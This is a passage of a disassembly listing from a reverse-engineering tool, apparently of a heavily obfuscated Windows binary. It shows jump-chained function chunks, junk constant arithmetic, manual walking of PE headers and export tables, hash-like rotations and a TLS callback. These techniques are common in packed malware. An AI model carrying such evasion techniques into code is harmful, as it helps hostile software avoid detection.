loc_42114E: ; CODE XREF: _94j21ax3:00421CA5�j
jz loc_42BF8A
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_421154: ; CODE XREF: sub_42AE5A:loc_421C93�j
and edx, 81474928h
add edx, 0E702E4CAh
cmp ebx, edx
xchg ebp, [esp+4+var_4]
mov edx, ebp
jmp loc_42536A
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4216D0
loc_42116C: ; CODE XREF: sub_4216D0:loc_42366E�j
mov eax, [ebp-4]
xor edx, edx
div dword ptr [ebp-8]
push ebx
push 0EC50FBE1h
pop ebx
jmp loc_423E2E
; END OF FUNCTION CHUNK FOR sub_4216D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C5E8
loc_421180: ; CODE XREF: sub_42C5E8+E�j
push eax
call sub_429DCC
cmp dword ptr [ebp-0Ch], 0
jz loc_421933
jmp loc_423CFD
; END OF FUNCTION CHUNK FOR sub_42C5E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_421195: ; CODE XREF: sub_4248E7:loc_428C80�j
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 100h
jnz loc_4230B9
jmp loc_421FF7
; END OF FUNCTION CHUNK FOR sub_4248E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AEB
loc_4211AE: ; CODE XREF: sub_427AEB:loc_42AED9�j
cmp dword ptr [ebp-14h], 4
jnz loc_42C1A3
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
mov edx, [ebp+8]
jmp loc_429A6C
; END OF FUNCTION CHUNK FOR sub_427AEB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_216. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4284C0
loc_4211CE: ; CODE XREF: sub_4284C0+C�j
call sub_426B65
loc_4211D3: ; CODE XREF: sub_427849+3BE1�j
jmp loc_421000
; END OF FUNCTION CHUNK FOR sub_4284C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_4211D8: ; CODE XREF: sub_422392+1E1A�j
; sub_422392:loc_42A28E�j
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+6]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+14h]
add eax, [ebp+var_4]
add eax, 18h
jmp loc_4291F5
; END OF FUNCTION CHUNK FOR sub_422392
; =============== S U B R O U T I N E =======================================
sub_4211F4 proc near ; CODE XREF: sub_4295BA�j
; DATA XREF: sub_424DE8:loc_4295B0�o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00423052 SIZE 0000001A BYTES
rol eax, 0Dh
push eax
push eax
push 0AAFCDFAFh
pop eax
jmp loc_423052
sub_4211F4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_421204: ; CODE XREF: sub_42C057:loc_4265B7�j
mov al, 1
push offset sub_428A79
jmp loc_42937D
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F65
loc_421210: ; CODE XREF: sub_428F65:loc_4256FD�j
mov ebx, eax
xchg ebx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_428F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_421216: ; CODE XREF: sub_421402:loc_4257B2�j
pushf
push offset sub_424A57
jmp loc_4237D7
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421221: ; CODE XREF: sub_42284F:loc_4256A1�j
jz loc_42A566
jmp loc_427EEB
; ---------------------------------------------------------------------------
loc_42122C: ; CODE XREF: sub_42284F:loc_4296E2�j
cmp dword ptr [ebp-4], 6
jnz loc_427EEB
jmp loc_428160
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
mov ebp, ecx
jmp sub_423BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_421242: ; CODE XREF: _94j21ax3:00422A8F�j
; _94j21ax3:00424877�j ...
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421246 proc near ; CODE XREF: sub_428BBD-6E10�j
; FUNCTION CHUNK AT 00424DBF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042BF0A SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_42BF0A
sub_421246 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421C84
loc_42124E: ; CODE XREF: sub_421C84:loc_421C8E�j
add edx, ebp
push ebx
push 663BC1F4h
pop ebx
sub ebx, 73C7926Fh
jmp loc_423E77
; END OF FUNCTION CHUNK FOR sub_421C84
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4239F1
loc_421262: ; CODE XREF: sub_4239F1+14�j
ror eax, 0Fh
mov ds:dword_423438, eax
retn
; END OF FUNCTION CHUNK FOR sub_4239F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42126C: ; CODE XREF: sub_4272E9+6�j
jmp loc_421547
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_421271: ; CODE XREF: sub_42454E+13�j
jmp loc_42441D
; END OF FUNCTION CHUNK FOR sub_42454E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC17
loc_421276: ; CODE XREF: sub_42AC17-6DEE�j
; _94j21ax3:loc_424FD7�j
jmp nullsub_129
; END OF FUNCTION CHUNK FOR sub_42AC17
; ---------------------------------------------------------------------------
loc_42127B: ; CODE XREF: _94j21ax3:00423B3F�j
rol eax, 0Fh
push offset sub_42C40A
jmp loc_424C98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42848B
loc_421288: ; CODE XREF: sub_42848B+114E�j
or eax, eax
jnz loc_42782B
call sub_42574E
mov edx, 3CC6743Ch
push offset sub_4244BB
loc_42129F: ; CODE XREF: sub_427668:loc_4271E0�j
jmp loc_42464E
; END OF FUNCTION CHUNK FOR sub_42848B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A277
loc_4212A4: ; CODE XREF: sub_42A277-5A81�j
add eax, 0F47D17CBh
xchg eax, [esp+0]
jmp loc_424089
; END OF FUNCTION CHUNK FOR sub_42A277
; ---------------------------------------------------------------------------
rol edx, 4
jmp loc_423092
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4212BA: ; CODE XREF: sub_422EB0:loc_4255F6�j
jz loc_428149
jmp loc_427ACD
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4212C5: ; CODE XREF: sub_423324+3E46�j
; sub_4294B3:loc_4296B1�j
push 0FB4803D1h
pop eax
sub eax, 1A296BE0h
or eax, 0CEE619CBh
jmp loc_429640
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421126
loc_4212DC: ; CODE XREF: sub_421126+16�j
xor edx, 86CF3E4h
call sub_4239A5
push eax
ror eax, 19h
call sub_42A4DC
; END OF FUNCTION CHUNK FOR sub_421126
; START OF FUNCTION CHUNK FOR sub_4227F5
loc_4212F0: ; CODE XREF: sub_4227F5+3�j
jmp loc_424566
; END OF FUNCTION CHUNK FOR sub_4227F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_4212F5: ; CODE XREF: sub_42C0BC:loc_42C588�j
pop ebx
sub ebx, 0EA4325Ch
xor ebx, 0A0FF8473h
add ebx, 3267451Ah
xchg ebx, [esp-4+arg_0]
jmp loc_429D30
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FDC
loc_421310: ; CODE XREF: sub_422FDC:loc_428BA1�j
push offset sub_4225A5
jmp nullsub_220
; END OF FUNCTION CHUNK FOR sub_422FDC
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42131B proc near ; DATA XREF: sub_423324-1C1B�o
; _94j21ax3:00427284�o
var_2D0 = dword ptr -2D0h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00424C06 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B14D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042C2CD SIZE 00000015 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFD38h
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+arg_0]
jmp loc_42C2CD
sub_42131B endp
; =============== S U B R O U T I N E =======================================
sub_421330 proc near ; DATA XREF: sub_424EFA+1FAF�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004227F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004269B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004279D7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00429126 SIZE 00000006 BYTES
push 1C876E3Ch
pop eax
xor eax, 0D536D5C2h
add eax, ebp
add eax, 364E43FAh
mov eax, [eax]
jmp loc_4269B1
sub_421330 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42134B proc near ; CODE XREF: sub_421D33+24C3�j
; FUNCTION CHUNK AT 00421A0B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00421D73 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00422582 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042742B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428081 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004292C0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042964A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00429BF1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AD19 SIZE 0000001A BYTES
add esp, 0FFFFFFE0h
jmp loc_42964A
sub_42134B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A33
loc_421353: ; CODE XREF: sub_423A33:loc_424330�j
ror eax, 1Ch
mov ds:dword_42C214, eax
retn
; END OF FUNCTION CHUNK FOR sub_423A33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425539
loc_42135D: ; CODE XREF: sub_425539+1�j
jmp loc_4290EA
; END OF FUNCTION CHUNK FOR sub_425539
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421A4F
loc_421362: ; CODE XREF: sub_423A33+8�j
; sub_421A4F+49CB�j
rol eax, 1Ch
push eax
call sub_423F43
retn
; END OF FUNCTION CHUNK FOR sub_421A4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E13
loc_42136C: ; CODE XREF: sub_427E13:loc_421E1E�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_427E13
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEDC
loc_421370: ; CODE XREF: sub_42BEDC-381B�j
jmp nullsub_178
; END OF FUNCTION CHUNK FOR sub_42BEDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_421375: ; CODE XREF: sub_4221B8+4C50�j
jmp nullsub_167
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4216D0
loc_42137A: ; CODE XREF: sub_4216D0+AE56�j
push 5F44D1FEh
mov eax, offset sub_421388
xchg eax, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_4216D0
; =============== S U B R O U T I N E =======================================
sub_421388 proc near ; DATA XREF: sub_4216D0-351�o
; FUNCTION CHUNK AT 004239CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425B22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426B34 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042B0E6 SIZE 0000001B BYTES
and eax, 1053EF80h
jmp loc_4239CE
sub_421388 endp
; =============== S U B R O U T I N E =======================================
sub_421393 proc near ; DATA XREF: _94j21ax3:004288A0�o
; FUNCTION CHUNK AT 00424FBD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042BA85 SIZE 00000005 BYTES
pushf
push 52713D1Fh
pop edx
and edx, 89DA84ECh
rol edx, 1Fh
jmp loc_42BA85
sub_421393 endp
; =============== S U B R O U T I N E =======================================
sub_4213A8 proc near ; CODE XREF: _94j21ax3:00426A6B�j
; _94j21ax3:loc_428CBF�p
; FUNCTION CHUNK AT 00424A64 SIZE 0000000A BYTES
mov [esp+0], ecx
pop ecx
push ecx
mov [esp+0], ebx
or edx, 0F84237DBh
sub edx, ecx
jmp loc_424A64
sub_4213A8 endp
; ---------------------------------------------------------------------------
mov ecx, [edx]
jmp loc_42817A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB0D
loc_4213C4: ; CODE XREF: sub_42BB0D:loc_424084�j
rol edx, 11h
xor edx, 305CFBB8h
xchg edx, [esp+0]
pushf
push offset sub_428C49
jmp loc_42AA2B
; END OF FUNCTION CHUNK FOR sub_42BB0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42220B
loc_4213DB: ; CODE XREF: sub_42220B+D�j
push edx
xchg ebx, edx
push 0DDAD4766h
pop ebx
sub ebx, 68C27E75h
jnz loc_427F67
mov ebp, [ecx]
jmp loc_42B101
; END OF FUNCTION CHUNK FOR sub_42220B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4213F7: ; CODE XREF: sub_422EB0:loc_4295E8�j
cmp edi, 73C2E5F5h
jmp loc_425610
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_421402 proc near ; DATA XREF: sub_4210C7+6�o
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421216 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004214BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421CD6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421FC9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004226D5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042280A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004229C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423794 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004237D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004244D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042501E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004257B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004264DC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004278C4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00427FC4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004282E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283EC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004284D1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042885D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FB3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004293E5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A59D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A8FD SIZE 0000001C BYTES
push edi
push 46DDD122h
mov edi, offset loc_421411
xchg edi, [esp+10h+var_10]
locret_421410: ; CODE XREF: _94j21ax3:0042647A�j
retn
; ---------------------------------------------------------------------------
loc_421411: ; DATA XREF: sub_421402+6�o
xor edi, 46DDD123h
jmp loc_42501E
; ---------------------------------------------------------------------------
loc_42141C: ; CODE XREF: _94j21ax3:004228DC�j
jno sub_424475
loc_421422: ; CODE XREF: _94j21ax3:loc_42A9CB�j
push ebx
push 120F4D79h
pop ebx
jmp loc_421FC9
; ---------------------------------------------------------------------------
xchg edi, ebx
jmp sub_4268C1
; ---------------------------------------------------------------------------
loc_421435: ; DATA XREF: sub_429EDB+9A0�o
add eax, ebp
add eax, 59D3879Bh
mov eax, [eax]
push ebp
mov [esp+0], eax
call sub_429BE2
jmp loc_4244D6
; ---------------------------------------------------------------------------
push 5B49B643h
jmp loc_42A59D
sub_421402 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421457 proc near ; CODE XREF: _94j21ax3:004232B1�j
; sub_423EAE+3EE2�p
; FUNCTION CHUNK AT 00426AD2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427B40 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004295BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A4D2 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
pop ebp
push 6BEF18E9h
pop eax
or eax, 5E9CCCDDh
add eax, 8042570Fh
mov eax, [eax]
jmp loc_426AD2
sub_421457 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test ebp, 662B2074h
jmp loc_4281FF
; =============== S U B R O U T I N E =======================================
sub_421480 proc near ; CODE XREF: sub_42921C+3�j
; FUNCTION CHUNK AT 00421ADC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00423F23 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00425267 SIZE 00000005 BYTES
add esp, 0FFFFFFF4h
mov [ebp-8], eax
add edx, ebx
rol edx, 5
xor edx, ecx
jmp loc_423F23
sub_421480 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_421492: ; CODE XREF: sub_4281A5:loc_42C3D1�j
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_424A79
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_424A79
call sub_4269EC
jnz loc_424A79
jmp loc_425527
; END OF FUNCTION CHUNK FOR sub_4281A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4214BB: ; CODE XREF: sub_421402+50E8�j
jmp loc_4278C4
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4214C0: ; CODE XREF: sub_42284F:loc_42BAB7�j
cmp esi, ebp
jmp loc_42A6CD
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_4214C7: ; CODE XREF: sub_42C24F:loc_4280EB�j
jnz loc_426C46
jmp loc_42C53C
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
ror esi, 1Fh
jmp sub_42A852
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247D2
loc_4214DB: ; CODE XREF: sub_4247D2+7�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_4247D2
; ---------------------------------------------------------------------------
loc_4214E0: ; CODE XREF: _94j21ax3:00424F6F�j
add ebx, 0D612A9AAh
; =============== S U B R O U T I N E =======================================
sub_4214E6 proc near ; CODE XREF: sub_423081+64FF�p
; FUNCTION CHUNK AT 0042294D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004290DF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B27B SIZE 0000000F BYTES
mov [esp+0], esi
pop esi
xor edx, 7EC091FAh
add eax, edx
pop edx
jmp loc_42294D
sub_4214E6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427004
loc_4214F8: ; CODE XREF: sub_427004+18�j
push ecx
push 84851F46h
pop ecx
and ecx, 0B4B1459h
sub ecx, 1BECF9C8h
jb loc_427D42
mov ebx, esi
jmp loc_427D34
; END OF FUNCTION CHUNK FOR sub_427004
; ---------------------------------------------------------------------------
loc_421518: ; DATA XREF: sub_4257BC:loc_428593�o
lea eax, [ebp-70h]
push eax
push offset sub_4225D9
jmp loc_4256E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421526: ; CODE XREF: sub_42284F:loc_4258D6�j
push 0D5B3FF3Bh
pop esi
sub esi, 6D4E549Ch
rol esi, 18h
jmp loc_421F1C
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_42153A: ; CODE XREF: sub_42AA5F:loc_4251DE�j
push ecx
mov esp, ebp
call sub_42C03F
loc_421542: ; CODE XREF: sub_42B856-2B57�j
jmp loc_4286A0
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_421547: ; CODE XREF: sub_4272E9:loc_42126C�j
pop ebp
mov eax, ds:dword_424090
call sub_4276A3
loc_421553: ; CODE XREF: _94j21ax3:0042C144�j
jmp loc_422522
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
sub_421558 proc near ; CODE XREF: _94j21ax3:0042296A�j
; sub_421822:loc_423ED8�p
; FUNCTION CHUNK AT 00428FAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429792 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042AA50 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
call sub_42574E
mov edx, 20413B0Fh
push edi
push 79BDEB97h
pop edi
or edi, 8D3F4FEDh
jmp loc_428FAE
sub_421558 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421578 proc near ; CODE XREF: sub_426D61�j
; DATA XREF: sub_423614+3743�o
mov [ebp-20h], eax
sub_421578 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42157B: ; CODE XREF: sub_421D33+704E�j
jmp loc_422E3E
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_421580: ; CODE XREF: sub_423614:loc_426D3D�j
test byte ptr [ebp-8], 2
jz loc_42B511
push ebp
mov eax, [ebp-20h]
call sub_429862
pop ecx
jmp loc_42B50E
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421599: ; CODE XREF: sub_42284F+5917�j
shl ecx, 12h
jno loc_42C03A
adc esi, 0BCFA3EDEh
jb loc_422F9E
jmp loc_423572
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_4215B3: ; CODE XREF: sub_425790+16�j
mov eax, [eax]
or eax, eax
jnz loc_4225F9
push offset loc_4267F2
jmp loc_422C6C
; END OF FUNCTION CHUNK FOR sub_425790
; ---------------------------------------------------------------------------
mov edx, 6FDE1A91h
push eax
push 380AD42Dh
pop eax
sub eax, 0EA574FA8h
cmp eax, 0C0569062h
jmp loc_429DC7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD03
loc_4215E5: ; CODE XREF: sub_42BD03+E�j
jmp loc_423201
; END OF FUNCTION CHUNK FOR sub_42BD03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_4215EA: ; CODE XREF: sub_42AA5F+835�j
jmp loc_425A03
; END OF FUNCTION CHUNK FOR sub_42AA5F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4276A3
loc_4215F0: ; CODE XREF: sub_4276A3+C�j
jmp loc_427EB3
; END OF FUNCTION CHUNK FOR sub_4276A3
; ---------------------------------------------------------------------------
loc_4215F5: ; DATA XREF: sub_42194B+7�o
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_4215F9 proc near ; CODE XREF: sub_42306C+7�p
; sub_428EBB+15�p ...
jnb sub_42BFAD
call sub_42B03C
loc_421604: ; CODE XREF: _94j21ax3:0042A48B�p
push ebp
mov ebp, esp
call sub_429280
loc_42160C: ; CODE XREF: sub_4287BF-53C�j
jmp sub_42BAC2
sub_4215F9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_421611: ; CODE XREF: sub_42169F+A14B�j
add edx, eax
jmp loc_42668B
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_421618: ; CODE XREF: sub_42A0CC+17B4�j
shr esi, 7
or edi, 90236577h
mov ebx, 0D5EC0A0Dh
and ecx, edx
jmp loc_42356D
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42162D: ; CODE XREF: sub_423F55+6619�j
push 0
push 10h
mov eax, [ebp+8]
pushf
mov [esp+0Ch+var_C], eax
push ecx
push 8CDBA6A2h
pop ecx
jmp loc_42845E
; END OF FUNCTION CHUNK FOR sub_423F55
; =============== S U B R O U T I N E =======================================
sub_421644 proc near ; CODE XREF: sub_42284F:loc_423028�p
; _94j21ax3:00429665�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004218F0 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425600 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
loc_421648: ; CODE XREF: _94j21ax3:00429A3A�j
push 0
push 0
push 24046234h
jmp loc_4218F0
sub_421644 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421656 proc near ; CODE XREF: sub_427344:loc_425551�j
; FUNCTION CHUNK AT 0042517F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425AEA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426F8C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428468 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428ADA SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042AD03 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042ADE3 SIZE 00000005 BYTES
add esp, 0FFFFFFECh
cmp ds:byte_426F58, 0
jnz loc_428468
lea edx, [ebp-14h]
jmp loc_42517F
sub_421656 endp
; =============== S U B R O U T I N E =======================================
sub_42166E proc near ; CODE XREF: sub_423324+20�p
; _94j21ax3:00425677�j
mov [esp+0], edx
pop edx
add esp, 4
mov eax, 52h
call sub_425A09
jmp TlsCallback_0
sub_42166E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp loc_42C0AC
; =============== S U B R O U T I N E =======================================
sub_421689 proc near ; CODE XREF: sub_42169F:loc_424C9D�p
; sub_4271F1:loc_4271F8�j
; FUNCTION CHUNK AT 00421714 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00421D09 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00422633 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004232EA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004236F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423D80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424955 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004257AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042645F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004267AE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042688B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427C30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427ED6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428C85 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042A18D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A2F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A473 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B1E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BC0C SIZE 0000000B BYTES
push ebp
jmp loc_428C85
sub_421689 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42168F: ; CODE XREF: sub_428BBD-3B29�j
jns loc_42AC60
xchg esi, [edi]
mov ebx, [ecx]
pushf
jmp loc_42526C
; END OF FUNCTION CHUNK FOR sub_428BBD
; =============== S U B R O U T I N E =======================================
sub_42169F proc near ; CODE XREF: sub_42284F+2474�p
; _94j21ax3:004292BB�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 00421611 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00421A1C SIZE 00000012 BYTES
